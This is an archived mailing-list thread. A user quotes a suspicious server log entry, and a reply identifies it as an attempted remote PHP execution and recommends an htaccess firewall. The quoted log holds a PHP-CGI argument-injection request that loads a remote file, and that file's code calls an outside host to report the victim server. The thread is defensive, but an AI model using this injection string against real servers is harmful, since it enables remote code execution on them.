[OT] server log entry?
Matthias Rebbe
matthias_livecode_150811 at m-r-d.de
Fri May 24 07:44:11 EDT 2013
Hi Thierry,
i am not an php expert, but it seems that someone tried to execute a remote php script on your server by adding some parameters to your index.php. But as i said, i am not an expert. But it was definitely an attack.
There is a free htaccess firewall available at
http://perishablepress.com/5g-blacklist-2012/
I do not know if the firewall stops that attack but it is a really useful protection for your server.
Regards,
Matthias
Am 24.05.2013 um 11:16 schrieb Thierry Douez <th.douez at gmail.com>:
> Hi,
>
> Can someone could help me to understand one of my server log?
>
>
> Here is the line:
>
> 193.107.17.36 ... "GET
> /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://
> gofastdownload.com/rf/s.txt HTTP/1.1" 200 6027 "-" "Python-urllib/2.6"
>
> The file ../rf/s.txt contains:
>
> <?php file_get_contents('
> http://gofastdownload.com/rf/s.php?d='.$_SERVER['HTTP_HOST']); exit(0); ?>
>
> The IP point in the middle of nowhere in Russia.
>
> and finally I know nothing about php.
>
> Thanks for any hints,
>
> Regards,
>
> Thierry
>
> ------------------------------------------------
> Thierry Douez - http://sunny-tdz.com
> Maker of sunnYperl - sunnYmidi - sunnYmage
> _______________________________________________
> use-livecode mailing list
> use-livecode at lists.runrev.com
> Please visit this url to subscribe, unsubscribe and manage your subscription preferences:
> http://lists.runrev.com/mailman/listinfo/use-livecode
More information about the use-livecode
mailing list